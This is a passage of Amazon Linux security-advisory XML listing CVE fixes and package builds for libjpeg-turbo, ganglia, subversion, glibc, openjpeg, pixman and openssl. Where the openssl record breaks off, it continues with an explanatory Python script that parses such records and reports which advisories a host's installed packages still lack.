epoch="0" arch="x86_64"><filename>Packages/nspr-4.10.2-1.19.amzn1.x86_64.rpm</filename></package><package name="nspr-debuginfo" version="4.10.2" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/nspr-debuginfo-4.10.2-1.19.amzn1.i686.rpm</filename></package><package name="nspr-devel" version="4.10.2" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/nspr-devel-4.10.2-1.19.amzn1.i686.rpm</filename></package><package name="nspr" version="4.10.2" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/nspr-4.10.2-1.19.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" 
author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-267</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-267: medium priority package update for libjpeg-turbo</title><issued date="2013-12-17 21:32:00" /><updated date="2014-09-16 22:13:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-6630:
An uninitialized memory read issue was found in the way libjpeg-turbo decoded images with missing Start Of Scan (SOS) JPEG markers or Define Huffman Table (DHT) JPEG markers. A remote attacker could create a specially crafted JPEG image that, when decoded, could possibly lead to a disclosure of potentially sensitive information.
CVE-2013-6629:
An uninitialized memory read issue was found in the way libjpeg-turbo decoded images with missing Start Of Scan (SOS) JPEG markers or Define Huffman Table (DHT) JPEG markers. A remote attacker could create a specially crafted JPEG image that, when decoded, could possibly lead to a disclosure of potentially sensitive information.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6629" title="" id="CVE-2013-6629" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6630" title="" id="CVE-2013-6630" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2013:1803.html" title="" id="RHSA-2013:1803" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libjpeg-turbo-static" version="1.2.1" release="3.4.amzn1" epoch="0" arch="x86_64"><filename>Packages/libjpeg-turbo-static-1.2.1-3.4.amzn1.x86_64.rpm</filename></package><package name="libjpeg-turbo-debuginfo" version="1.2.1" release="3.4.amzn1" epoch="0" arch="x86_64"><filename>Packages/libjpeg-turbo-debuginfo-1.2.1-3.4.amzn1.x86_64.rpm</filename></package><package name="libjpeg-turbo-devel" version="1.2.1" release="3.4.amzn1" epoch="0" arch="x86_64"><filename>Packages/libjpeg-turbo-devel-1.2.1-3.4.amzn1.x86_64.rpm</filename></package><package name="turbojpeg-devel" version="1.2.1" release="3.4.amzn1" epoch="0" arch="x86_64"><filename>Packages/turbojpeg-devel-1.2.1-3.4.amzn1.x86_64.rpm</filename></package><package name="libjpeg-turbo-utils" version="1.2.1" release="3.4.amzn1" epoch="0" arch="x86_64"><filename>Packages/libjpeg-turbo-utils-1.2.1-3.4.amzn1.x86_64.rpm</filename></package><package name="turbojpeg" version="1.2.1" release="3.4.amzn1" epoch="0" arch="x86_64"><filename>Packages/turbojpeg-1.2.1-3.4.amzn1.x86_64.rpm</filename></package><package name="libjpeg-turbo" version="1.2.1" release="3.4.amzn1" epoch="0" arch="x86_64"><filename>Packages/libjpeg-turbo-1.2.1-3.4.amzn1.x86_64.rpm</filename></package><package name="libjpeg-turbo-static" version="1.2.1" release="3.4.amzn1" epoch="0" arch="i686"><filename>Packages/libjpeg-turbo-static-1.2.1-3.4.amzn1.i686.rpm</filename></package><package name="libjpeg-turbo-debuginfo" version="1.2.1" release="3.4.amzn1" epoch="0" 
arch="i686"><filename>Packages/libjpeg-turbo-debuginfo-1.2.1-3.4.amzn1.i686.rpm</filename></package><package name="libjpeg-turbo-utils" version="1.2.1" release="3.4.amzn1" epoch="0" arch="i686"><filename>Packages/libjpeg-turbo-utils-1.2.1-3.4.amzn1.i686.rpm</filename></package><package name="turbojpeg" version="1.2.1" release="3.4.amzn1" epoch="0" arch="i686"><filename>Packages/turbojpeg-1.2.1-3.4.amzn1.i686.rpm</filename></package><package name="turbojpeg-devel" version="1.2.1" release="3.4.amzn1" epoch="0" arch="i686"><filename>Packages/turbojpeg-devel-1.2.1-3.4.amzn1.i686.rpm</filename></package><package name="libjpeg-turbo-devel" version="1.2.1" release="3.4.amzn1" epoch="0" arch="i686"><filename>Packages/libjpeg-turbo-devel-1.2.1-3.4.amzn1.i686.rpm</filename></package><package name="libjpeg-turbo" version="1.2.1" release="3.4.amzn1" epoch="0" arch="i686"><filename>Packages/libjpeg-turbo-1.2.1-3.4.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-268</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-268: medium priority package update for ganglia</title><issued date="2013-12-17 21:39:00" /><updated date="2014-09-16 22:14:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-6395:
Cross-site scripting (XSS) vulnerability in header.php in Ganglia Web 3.5.8 and 3.5.10 allows remote attackers to inject arbitrary web script or HTML via the host_regex parameter to the default URI, which is processed by get_context.php.
1034527:
CVE-2013-6395 ganglia: cross-site scripting flaw in the web interface
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6395" title="" id="CVE-2013-6395" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="ganglia-gmond" version="3.6.0" release="3.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/ganglia-gmond-3.6.0-3.6.amzn1.x86_64.rpm</filename></package><package name="ganglia-devel" version="3.6.0" release="3.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/ganglia-devel-3.6.0-3.6.amzn1.x86_64.rpm</filename></package><package name="ganglia" version="3.6.0" release="3.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/ganglia-3.6.0-3.6.amzn1.x86_64.rpm</filename></package><package name="ganglia-debuginfo" version="3.6.0" release="3.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/ganglia-debuginfo-3.6.0-3.6.amzn1.x86_64.rpm</filename></package><package name="ganglia-gmond-python" version="3.6.0" release="3.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/ganglia-gmond-python-3.6.0-3.6.amzn1.x86_64.rpm</filename></package><package name="ganglia-web" version="3.5.10" release="3.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/ganglia-web-3.5.10-3.6.amzn1.x86_64.rpm</filename></package><package name="ganglia-gmetad" version="3.6.0" release="3.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/ganglia-gmetad-3.6.0-3.6.amzn1.x86_64.rpm</filename></package><package name="ganglia-web" version="3.5.10" release="3.6.amzn1" epoch="0" arch="i686"><filename>Packages/ganglia-web-3.5.10-3.6.amzn1.i686.rpm</filename></package><package name="ganglia-gmond-python" version="3.6.0" release="3.6.amzn1" epoch="0" arch="i686"><filename>Packages/ganglia-gmond-python-3.6.0-3.6.amzn1.i686.rpm</filename></package><package name="ganglia-gmetad" version="3.6.0" release="3.6.amzn1" epoch="0" arch="i686"><filename>Packages/ganglia-gmetad-3.6.0-3.6.amzn1.i686.rpm</filename></package><package name="ganglia-gmond" version="3.6.0" 
release="3.6.amzn1" epoch="0" arch="i686"><filename>Packages/ganglia-gmond-3.6.0-3.6.amzn1.i686.rpm</filename></package><package name="ganglia-devel" version="3.6.0" release="3.6.amzn1" epoch="0" arch="i686"><filename>Packages/ganglia-devel-3.6.0-3.6.amzn1.i686.rpm</filename></package><package name="ganglia" version="3.6.0" release="3.6.amzn1" epoch="0" arch="i686"><filename>Packages/ganglia-3.6.0-3.6.amzn1.i686.rpm</filename></package><package name="ganglia-debuginfo" version="3.6.0" release="3.6.amzn1" epoch="0" arch="i686"><filename>Packages/ganglia-debuginfo-3.6.0-3.6.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-269</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-269: medium priority package update for subversion</title><issued date="2013-12-17 21:39:00" /><updated date="2014-09-16 22:14:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-4558:
The get_parent_resource function in repos.c in the mod_dav_svn module for the Apache HTTP Server, in Subversion 1.7.11 through 1.7.13 and 1.8.1 through 1.8.4, when built with assertions enabled and SVNAutoversioning is enabled, allows remote attackers to cause a denial of service (assertion failure and Apache process abort) via a non-canonical URL in a request, as demonstrated using a trailing /.
1033431:
CVE-2013-4558 subversion: mod_dav_svn assertion when handling certain requests with autoversioning enabled
CVE-2013-4505:
The is_this_legal function in mod_dontdothat for Apache Subversion 1.4.0 through 1.7.13 and 1.8.0 through 1.8.4 allows remote attackers to bypass intended access restrictions and possibly cause a denial of service (resource consumption) via a relative URL in a REPORT request.
1033995:
CVE-2013-4505 subversion: mod_dontdothat does not block requests from certain clients
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4505" title="" id="CVE-2013-4505" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4558" title="" id="CVE-2013-4558" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="subversion-devel" version="1.7.14" release="1.36.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-devel-1.7.14-1.36.amzn1.x86_64.rpm</filename></package><package name="subversion-perl" version="1.7.14" release="1.36.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-perl-1.7.14-1.36.amzn1.x86_64.rpm</filename></package><package name="subversion-ruby" version="1.7.14" release="1.36.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-ruby-1.7.14-1.36.amzn1.x86_64.rpm</filename></package><package name="subversion-debuginfo" version="1.7.14" release="1.36.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-debuginfo-1.7.14-1.36.amzn1.x86_64.rpm</filename></package><package name="subversion-javahl" version="1.7.14" release="1.36.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-javahl-1.7.14-1.36.amzn1.x86_64.rpm</filename></package><package name="subversion" version="1.7.14" release="1.36.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-1.7.14-1.36.amzn1.x86_64.rpm</filename></package><package name="mod_dav_svn" version="1.7.14" release="1.36.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod_dav_svn-1.7.14-1.36.amzn1.x86_64.rpm</filename></package><package name="subversion-libs" version="1.7.14" release="1.36.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-libs-1.7.14-1.36.amzn1.x86_64.rpm</filename></package><package name="subversion-tools" version="1.7.14" release="1.36.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-tools-1.7.14-1.36.amzn1.x86_64.rpm</filename></package><package name="subversion-python" 
version="1.7.14" release="1.36.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-python-1.7.14-1.36.amzn1.x86_64.rpm</filename></package><package name="subversion-ruby" version="1.7.14" release="1.36.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-ruby-1.7.14-1.36.amzn1.i686.rpm</filename></package><package name="subversion" version="1.7.14" release="1.36.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-1.7.14-1.36.amzn1.i686.rpm</filename></package><package name="subversion-javahl" version="1.7.14" release="1.36.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-javahl-1.7.14-1.36.amzn1.i686.rpm</filename></package><package name="subversion-tools" version="1.7.14" release="1.36.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-tools-1.7.14-1.36.amzn1.i686.rpm</filename></package><package name="subversion-libs" version="1.7.14" release="1.36.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-libs-1.7.14-1.36.amzn1.i686.rpm</filename></package><package name="subversion-devel" version="1.7.14" release="1.36.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-devel-1.7.14-1.36.amzn1.i686.rpm</filename></package><package name="mod_dav_svn" version="1.7.14" release="1.36.amzn1" epoch="0" arch="i686"><filename>Packages/mod_dav_svn-1.7.14-1.36.amzn1.i686.rpm</filename></package><package name="subversion-perl" version="1.7.14" release="1.36.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-perl-1.7.14-1.36.amzn1.i686.rpm</filename></package><package name="subversion-python" version="1.7.14" release="1.36.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-python-1.7.14-1.36.amzn1.i686.rpm</filename></package><package name="subversion-debuginfo" version="1.7.14" release="1.36.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-debuginfo-1.7.14-1.36.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" 
type="security" from="linux-security@amazon.com"><id>ALAS-2013-270</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-270: medium priority package update for glibc</title><issued date="2013-12-17 21:39:00" /><updated date="2014-09-16 22:16:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-4332:
Multiple integer overflow flaws, leading to heap-based buffer overflows, were found in glibc's memory allocator functions (pvalloc, valloc, and memalign). If an application used such a function, it could cause the application to crash or, potentially, execute arbitrary code with the privileges of the user running the application.
CVE-2013-1914:
It was found that getaddrinfo() did not limit the amount of stack memory used during name resolution. An attacker able to make an application resolve an attacker-controlled hostname or IP address could possibly cause the application to exhaust all stack memory and crash.
CVE-2013-0242:
A flaw was found in the regular expression matching routines that process multibyte character input. If an application utilized the glibc regular expression matching mechanism, an attacker could provide specially-crafted input that, when processed, would cause the application to crash.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0242" title="" id="CVE-2013-0242" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1914" title="" id="CVE-2013-1914" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4332" title="" id="CVE-2013-4332" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2013:1605.html" title="" id="RHSA-2013:1605" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="glibc" version="2.12" release="1.132.45.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-2.12-1.132.45.amzn1.x86_64.rpm</filename></package><package name="nscd" version="2.12" release="1.132.45.amzn1" epoch="0" arch="x86_64"><filename>Packages/nscd-2.12-1.132.45.amzn1.x86_64.rpm</filename></package><package name="glibc-devel" version="2.12" release="1.132.45.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-devel-2.12-1.132.45.amzn1.x86_64.rpm</filename></package><package name="glibc-common" version="2.12" release="1.132.45.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-common-2.12-1.132.45.amzn1.x86_64.rpm</filename></package><package name="glibc-debuginfo" version="2.12" release="1.132.45.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-debuginfo-2.12-1.132.45.amzn1.x86_64.rpm</filename></package><package name="glibc-headers" version="2.12" release="1.132.45.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-headers-2.12-1.132.45.amzn1.x86_64.rpm</filename></package><package name="glibc-static" version="2.12" release="1.132.45.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-static-2.12-1.132.45.amzn1.x86_64.rpm</filename></package><package name="glibc-debuginfo-common" version="2.12" release="1.132.45.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-debuginfo-common-2.12-1.132.45.amzn1.x86_64.rpm</filename></package><package 
name="glibc-utils" version="2.12" release="1.132.45.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-utils-2.12-1.132.45.amzn1.x86_64.rpm</filename></package><package name="glibc" version="2.12" release="1.132.45.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-2.12-1.132.45.amzn1.i686.rpm</filename></package><package name="glibc-utils" version="2.12" release="1.132.45.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-utils-2.12-1.132.45.amzn1.i686.rpm</filename></package><package name="glibc-debuginfo-common" version="2.12" release="1.132.45.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-debuginfo-common-2.12-1.132.45.amzn1.i686.rpm</filename></package><package name="glibc-common" version="2.12" release="1.132.45.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-common-2.12-1.132.45.amzn1.i686.rpm</filename></package><package name="glibc-headers" version="2.12" release="1.132.45.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-headers-2.12-1.132.45.amzn1.i686.rpm</filename></package><package name="glibc-static" version="2.12" release="1.132.45.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-static-2.12-1.132.45.amzn1.i686.rpm</filename></package><package name="glibc-debuginfo" version="2.12" release="1.132.45.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-debuginfo-2.12-1.132.45.amzn1.i686.rpm</filename></package><package name="nscd" version="2.12" release="1.132.45.amzn1" epoch="0" arch="i686"><filename>Packages/nscd-2.12-1.132.45.amzn1.i686.rpm</filename></package><package name="glibc-devel" version="2.12" release="1.132.45.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-devel-2.12-1.132.45.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-271</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-271: important priority package update for openjpeg</title><issued 
date="2014-01-14 15:55:00" /><updated date="2014-09-16 22:15:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-6054:
Multiple heap-based buffer overflow flaws were found in OpenJPEG. An attacker could create a specially crafted OpenJPEG image that, when opened, could cause an application using openjpeg to crash or, possibly, execute arbitrary code with the privileges of the user running the application.
CVE-2013-6052:
Multiple denial of service flaws were found in OpenJPEG. An attacker could create a specially crafted OpenJPEG image that, when opened, could cause an application using openjpeg to crash.
CVE-2013-6045:
Multiple heap-based buffer overflow flaws were found in OpenJPEG. An attacker could create a specially crafted OpenJPEG image that, when opened, could cause an application using openjpeg to crash or, possibly, execute arbitrary code with the privileges of the user running the application.
CVE-2013-1447:
Multiple denial of service flaws were found in OpenJPEG. An attacker could create a specially crafted OpenJPEG image that, when opened, could cause an application using openjpeg to crash.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1447" title="" id="CVE-2013-1447" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6045" title="" id="CVE-2013-6045" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6052" title="" id="CVE-2013-6052" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6054" title="" id="CVE-2013-6054" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2013:1850.html" title="" id="RHSA-2013:1850" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="openjpeg" version="1.3" release="10.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/openjpeg-1.3-10.7.amzn1.x86_64.rpm</filename></package><package name="openjpeg-debuginfo" version="1.3" release="10.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/openjpeg-debuginfo-1.3-10.7.amzn1.x86_64.rpm</filename></package><package name="openjpeg-devel" version="1.3" release="10.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/openjpeg-devel-1.3-10.7.amzn1.x86_64.rpm</filename></package><package name="openjpeg-libs" version="1.3" release="10.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/openjpeg-libs-1.3-10.7.amzn1.x86_64.rpm</filename></package><package name="openjpeg-libs" version="1.3" release="10.7.amzn1" epoch="0" arch="i686"><filename>Packages/openjpeg-libs-1.3-10.7.amzn1.i686.rpm</filename></package><package name="openjpeg-devel" version="1.3" release="10.7.amzn1" epoch="0" arch="i686"><filename>Packages/openjpeg-devel-1.3-10.7.amzn1.i686.rpm</filename></package><package name="openjpeg-debuginfo" version="1.3" release="10.7.amzn1" epoch="0" arch="i686"><filename>Packages/openjpeg-debuginfo-1.3-10.7.amzn1.i686.rpm</filename></package><package name="openjpeg" version="1.3" release="10.7.amzn1" epoch="0" 
arch="i686"><filename>Packages/openjpeg-1.3-10.7.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-272</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-272: important priority package update for pixman</title><issued date="2014-01-14 15:56:00" /><updated date="2014-09-16 22:16:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-6425:
An integer overflow, which led to a heap-based buffer overflow, was found in the way pixman handled trapezoids. If a remote attacker could trick an application using pixman into rendering a trapezoid shape with specially crafted coordinates, it could cause the application to crash or, possibly, execute arbitrary code with the privileges of the user running the application.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6425" title="" id="CVE-2013-6425" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2013:1869.html" title="" id="RHSA-2013:1869" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="pixman-debuginfo" version="0.26.2" release="5.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/pixman-debuginfo-0.26.2-5.10.amzn1.x86_64.rpm</filename></package><package name="pixman" version="0.26.2" release="5.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/pixman-0.26.2-5.10.amzn1.x86_64.rpm</filename></package><package name="pixman-devel" version="0.26.2" release="5.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/pixman-devel-0.26.2-5.10.amzn1.x86_64.rpm</filename></package><package name="pixman" version="0.26.2" release="5.10.amzn1" epoch="0" arch="i686"><filename>Packages/pixman-0.26.2-5.10.amzn1.i686.rpm</filename></package><package name="pixman-debuginfo" version="0.26.2" release="5.10.amzn1" epoch="0" arch="i686"><filename>Packages/pixman-debuginfo-0.26.2-5.10.amzn1.i686.rpm</filename></package><package name="pixman-devel" version="0.26.2" release="5.10.amzn1" epoch="0" arch="i686"><filename>Packages/pixman-devel-0.26.2-5.10.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-273</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-273: important priority package update for openssl</title><issued date="2014-01-14 15:56:00" /><updated date="2014-09-16 22:16:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-6450:
The DTLS retransmission implementation in OpenSSL through 0.9.8y and 1.x through 1.0.1e does not properly maintain data structures for digest and encryption contexts, which might allow man-in-the-middle attackers to trigger the use of a different context by interfering with packet delivery, related to ssl/d1_both.c and ssl/t1_enc.c.
It was discovered that the Datagram Transport Layer Security (DTLS) protocol implementation in OpenSSL did not properly maintain encryption and digest contexts during renegotiation. A lost or discarded renegotiation handshake packet could cause a DTLS client or server using OpenSSL to crash.
1047840:
CVE-2013-6450 openssl: crash in DTLS renegotiation after packet loss
CVE-2013-6449:
The ssl_get_algorithm2 function in ssl/s3_lib.c in OpenSSL before 1.0.2 obtains a certain version number from an incorrect data structure, which allows remote attackers to cause a denial of service (daemon crash) via crafted traffic from a TLS 1.2 client.
A flaw was found in the way OpenSSL determined which hashing algorithm to use when TLS protocol version 1.2 was enabled. This could possibly cause OpenSSL to use an incorrect hashing algorithm, leading to a crash of an application using the library.
1045363:
CVE-2013-6449 openssl: crash when using TLS 1.2 caused by use of incorrect hash algorithm
CVE-2013-4353:
A NULL pointer dereference flaw was found in the way OpenSSL handled TLS/SSL protocol handshake packets. A specially crafted handshake packet could cause a TLS/SSL client using OpenSSL to crash.
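Records like the ones on this page are meant to be consumed by a host-side check rather than read by hand. The Python script below is an added example, not code from Amazon Linux or from yum: it parses the update records of this updateinfo format (id, severity, cve references, and the name, epoch, version, release and arch of each package element) and reports which advisories still apply to a host's installed packages. The rpm version comparison is a simplified reimplementation of rpm's segment rules (an assumption, not rpm's own code), and the two sample records and the host inventory are constructed inline. The caveat it is built around is the epoch attribute: openssl here ships with epoch 1, so a parser that ignores the attribute and defaults it to 0 will compare a stale openssl 1.0.1e-4.54.amzn1 reported by the host with epoch 1 as newer than the fix and silently miss the advisory.

```python
"""Added example (not Amazon's or yum's code): a consumer for the updateinfo
format on this page that reports which advisories a host still lacks.  The
rpm version comparison is a simplified reimplementation (an assumption)."""
import re
import xml.etree.ElementTree as ET
from dataclasses import dataclass, field


@dataclass
class Advisory:
    id: str
    severity: str
    cves: list = field(default_factory=list)
    packages: dict = field(default_factory=dict)  # (name, arch) -> (epoch, version, release)


_SEG = re.compile(r"[0-9]+|[a-zA-Z]+|~")


def rpmvercmp(a, b):
    """rpm-style segment comparison for the common cases: numeric segments
    numerically, alpha segments lexically, numeric beats alpha, a tilde sorts
    before anything.  Returns -1, 0 or 1."""
    if a == b:
        return 0
    sa, sb = _SEG.findall(a), _SEG.findall(b)
    for x, y in zip(sa, sb):
        if x == y:
            continue
        if x == "~" or y == "~":
            return -1 if x == "~" else 1
        xnum, ynum = x.isdigit(), y.isdigit()
        if xnum != ynum:
            return 1 if xnum else -1
        if xnum:
            if int(x) == int(y):          # "01" and "1" are the same segment
                continue
            return 1 if int(x) > int(y) else -1
        return 1 if x > y else -1
    if len(sa) == len(sb):
        return 0
    # one string is a prefix of the other: the longer is newer unless its
    # extra part starts with a tilde (1.0~rc1 is older than 1.0)
    longer, sign = (sa, 1) if len(sa) > len(sb) else (sb, -1)
    return -sign if longer[min(len(sa), len(sb))] == "~" else sign


def evrcmp(evr1, evr2):
    """Compare (epoch, version, release) triples; epoch wins outright, so the
    epoch attribute of the package elements must be carried through."""
    e1, v1, r1 = evr1
    e2, v2, r2 = evr2
    if int(e1) != int(e2):
        return 1 if int(e1) > int(e2) else -1
    c = rpmvercmp(v1, v2)
    return c if c != 0 else rpmvercmp(r1, r2)


def parse_updateinfo(root):
    """Walk every update element below the root of an updateinfo document."""
    advisories = []
    for upd in root.iter("update"):
        adv = Advisory(id=upd.findtext("id", ""), severity=upd.findtext("severity", ""))
        for ref in upd.iter("reference"):
            if ref.get("type") == "cve":
                adv.cves.append(ref.get("id"))
        for pkg in upd.iter("package"):
            key = (pkg.get("name"), pkg.get("arch"))
            adv.packages[key] = (pkg.get("epoch", "0"), pkg.get("version"), pkg.get("release"))
        advisories.append(adv)
    return advisories


def parse_rpm_qa(text):
    """Parse 'name arch epoch version release' lines into the installed map."""
    # Produce them on a host with (the conditional prints 0 when no epoch is set):
    # rpm -qa --qf '%{NAME} %{ARCH} %|EPOCH?{%{EPOCH}}:{0}| %{VERSION} %{RELEASE}\n'
    installed = {}
    for line in text.splitlines():
        parts = line.split()
        if len(parts) == 5:
            name, arch, epoch, version, release = parts
            installed[(name, arch)] = (epoch, version, release)
    return installed


def missing_advisories(advisories, installed):
    """(advisory id, severity, stale packages) for each advisory where an
    installed package is older than the fixed build; absent packages are ignored."""
    report = []
    for adv in advisories:
        stale = [(n, a, installed[(n, a)], fixed)
                 for (n, a), fixed in adv.packages.items()
                 if (n, a) in installed and evrcmp(installed[(n, a)], fixed) == -1]
        if stale:
            report.append((adv.id, adv.severity, stale))
    return report


def sample_updateinfo():
    """Constructed sample mirroring two records on this page (built with
    ElementTree rather than pasted so the example stays self-contained)."""
    root = ET.Element("updates")

    def add(aid, severity, cves, pkgs):
        upd = ET.SubElement(root, "update", type="security", status="final")
        ET.SubElement(upd, "id").text = aid
        ET.SubElement(upd, "severity").text = severity
        refs = ET.SubElement(upd, "references")
        for cve in cves:
            ET.SubElement(refs, "reference", id=cve, type="cve")
        coll = ET.SubElement(ET.SubElement(upd, "pkglist"), "collection", short="amazon-linux-ami")
        for name, version, release, epoch, arch in pkgs:
            ET.SubElement(coll, "package", name=name, version=version,
                          release=release, epoch=epoch, arch=arch)

    add("ALAS-2014-273", "important", ["CVE-2013-4353", "CVE-2013-6449", "CVE-2013-6450"],
        [("openssl", "1.0.1e", "4.55.amzn1", "1", "x86_64")])
    add("ALAS-2014-272", "important", ["CVE-2013-6425"],
        [("pixman", "0.26.2", "5.10.amzn1", "0", "x86_64")])
    return root


# Constructed host inventory: openssl one release behind the fix, pixman current.
SAMPLE_RPM_QA = """openssl x86_64 1 1.0.1e 4.54.amzn1
pixman x86_64 0 0.26.2 5.10.amzn1
"""

if __name__ == "__main__":
    advs = parse_updateinfo(sample_updateinfo())
    for aid, sev, stale in missing_advisories(advs, parse_rpm_qa(SAMPLE_RPM_QA)):
        print(aid, sev, stale)
```

To run it against the real feed, pass ET.parse(path).getroot() to parse_updateinfo instead of the constructed sample and feed parse_rpm_qa the rpm -qa output from the comment; the report lists only advisories whose packages are installed and older than the fixed build, so a machine without openssl-devel is not flagged for that subpackage.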
